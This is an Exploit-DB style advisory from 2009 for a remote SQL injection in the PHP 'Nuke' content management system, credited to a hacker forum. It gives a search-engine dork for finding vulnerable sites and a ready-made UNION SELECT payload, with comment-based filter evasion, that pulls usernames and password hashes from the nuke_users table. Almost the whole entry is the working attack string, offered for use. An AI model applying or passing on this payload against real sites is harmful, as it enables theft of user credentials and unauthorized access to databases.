Nuke - SQL Injection

EDB-ID:

10725

CVE:

N/A


Platform:

PHP

Published:

2009-12-27

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=

Nuke Remote SQL Injection Vulnerability

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=

Found: FormatXFormaT
contact: hun4r@yahoo.com
Forum: Tkurd.com

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=

Dork:
article.php?sid=

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=

Exploit:
/**/union/**/all/**/select/**/1,2,3,4,concat(uname,0x3e,pass),6,7,8,9,10,11+from+nuke_users--

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=

Thanx: Sa3id , Angry-Boy , Neo , All Tkurd Memebers.

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=